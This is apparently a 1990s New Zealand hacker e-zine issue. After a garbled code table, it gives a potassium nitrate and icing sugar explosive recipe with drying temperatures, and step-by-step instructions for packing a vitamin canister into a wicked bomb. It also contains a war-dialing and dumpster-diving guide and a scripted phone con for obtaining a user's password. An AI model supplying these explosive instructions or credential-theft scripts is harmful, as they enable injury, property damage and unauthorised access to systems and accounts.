""-"""-8500 ""-"""-8600 ""-"""-8700 ""-"""-8800 ""-"""-8900 ChCh ChCh ChCh ChCh ""-"""-9000 """" Tima Tima Tima ""-"""-9100 Dune Dune Dune Dune ""-"""-9200 """" Inve Inve Inve ""-"""-9300 ChCh Nels Nels Nels ""-"""-9400 """" Blen Blen Blen ""-"""-9500 """" Grey Grey Grey ""-"""-9600 """" """" Hoki Hoki ""-"""-9700 """" """" WstP WstP ""-"""-9800 """" Blen ChCh Kaik ""-"""-9900 ------------->8--------------------------------------------------------- ABBREVIATIONS: [Cyntax: Those which aren't listed - you can figure 'em out out yourself] Auck: Auckland ChCh: Christchurch Dune: Dunedin Tima: Timaru Inve: Invercargil Nels: Nelson Blen: Blenhim Grey: Greymouth Hoki: Hokitika WesP: Westport Kaik: Kaikoura Gisb: Gisbourne Wgtn: Wellington PMnt: Palmerston Nth Wang: Wanganui Toko: Tokoroa Levi: Levin Mart: Martinborough Napi: Napier Taih: Taihape Mast: Masterton Taur: Tauranga Roto: Rotorua Whan: Whangarei Hami: Hamilton [Eon: Wow bet the cops go nutty over this one] ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Sweet Powder Thorium ������ � � ����������������������������������������� A good SIMPLE BUT EFFECTIVE Explosive: I use this recipe for most of my bombs: 1 Part Potassium Nitrate (Salt Peter, Nitrate of Potash) 1 Part Icing Sugar By volume. Shake to mix and away you go. The Pot Nitrate is the oxidant, the carbon in the sugar burns, and the fact that the sugar caramelizes and keeps in the heat replaces the sulphur in normal gunpowder. The Pot Nitrate may have to be dryed in the oven (At around 75 degrees C, no higher!), and so may the icing sugar (less than 150 degrees). This stuff is excellent for making "Redoxon Bombs", rockets, moarters, in fact all your anarchist needs... ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Hackin' Eon ������ � � ����������������������������������������� Here is a tried and true method of gaining access to a system 1: Find the System you wish to hack Either by knowing the number of the system or by scanning for it. By scanning, I mean a program such as "Toneloc" that dials XXX-XXX1 then XXX-XXX2 etc... it searches for a CARRIER, and if it finds one it logs it. 2: Trash the comp that runs the system Look for stuff, like printouts etc., that may give you an idea of what/how there system runs. Also look for any company security names on the pices of paper you trash out. Also, look for any information that can explain to you the inner workings of the company. 3: Call the company VOICE See if you can Social Engineer a user name and password out of the secretary ie. You: "Yeah, hi. This is Mike from control. Are you having problems with your computer terminal?" Them: "No" You: "Hmm, that's strange. We're having a few down here. Just a moment. What's your username?" Them: "Oh, it's 'C_Tp'." You: "Yeah, there's a big error. Umm, we don't even have you as being logged into the system. Ummm, hmm, okay, I'll try logging in as you." [Scrambling around making lots of noise] You: "So, the username's 'C_Tp'?" Them: "Yes." You: "Yep. It's a valid user alright. Umm, your password please?" Them: "TDGA" You: "Yeah. Umm, it checks out I'm loggin in. Humm, oh, here we go. Oh, you didn't correctly logout lastime. Okay, I think it should work now. Sorry for wasting your time .." Guess what you just got? THIS WORKS and it works well. Why not give it a go? ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Redox Bombs Thorium ������ � � ����������������������������������������� Redoxons are a type of vitamin available from the chemist. They make Vitamin A, C and D I think, all effervescent, as well as Berrocca... Anyway, it's these containers that are good - let all the hyperchondriacs in your flat or house eat/drink them, and keep the canisters... They are an aluminium tube, sealed at one end, and with a plastic seal top. They hold about 50 ml. If your bomb needs a wick to start it, as gunpowder does, put a hole in about half way up the canister. This will also stop the cap coming off due to expansion of air during the glue setting. Take one of these and using gunpowder or other explosive material fill them to just under the top, then shake them down. Clear the excess powder away from the top using your finger or a clean rag, depending on the nastiness of your explosive, then glue the top on with superglue or araldyte. Place sticky tape over the hole if you have one, then leave to dry for 24 hrs. Remove tape, put in wick, light, BANG. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Editaz Knotez EON ������ � � ����������������������������������������� Ever noticed the way when u feel down the world attacks you?? ALL PC <386 +> OWNERS: GIVE UP DOS! Run LINUX!!!! UNIX is the BEST!!! DOS is LAME!!!! humm ok well anyways!!! A few quotez: "Truth is free, but information costs." "The world is run by 1's and 0's!!!" "Fuck the police, fuck the FBI, the CIA and all the rest!!!" "We are the children of a new age. The age of the chip, and the modem. The age of COMMUNICATION!!!!" Well, humm, guess thats the end of yet another SLi mag!! Ahhhh, FUCK, umm, just to keep ourselvz outta shit: "All product names are TradeMarks of their respective companies." "The views expressed in this mag are not neccessarily those of the editors or of any member of the SLi group or of any system operator who carries this mag!" "The members / supporters of SLi at no time take responsibility for the actions of anyone / anything (being politically correct) resulting directly or indirectly from this mag and its contents" "The editor is unable to release any INFORMATION on SLi members or any person that is in anyway connected with SLi" Oh yeah, this is a small bbs list. They're pretty ok bbs's and outa the 80 in Wellington NZ they're some of the only decent ones. Bad Sector BBS ............................. +64-4-479-1641 The Video Drome ............................ +64-4-388-5410 Wizards Lair ............................... +64-4-233-8538 " " " " " " " " " " " ............................... +64-4-233-9135 " " " " " Oh, we have a mailing address if u want any articles in the next issue or just have any comments please mail them too. PS, any $DONATIONS$ to get SLi BBS back up would be real cool :) Please send articles on 720-1.44 meg IBM, or Amiga, formatted disks. Enclose a stamped, self addressed envelope if you want the disk back. SLi Box 3030 Onekawa Hawkes Bay New Zealand A few last words: FUCK LIFE IS AWSOME !!!! FUCK COPS ARE LAME FUCK WE ARE THE NEW GENERATION FUCK !!!!!!!!!!!!!! [Cyntax: I think he swears too much, but oh well.. *grin*] May we all live in a world free From war and death. Let us become one people, One flag, one world. -- Eon. EOF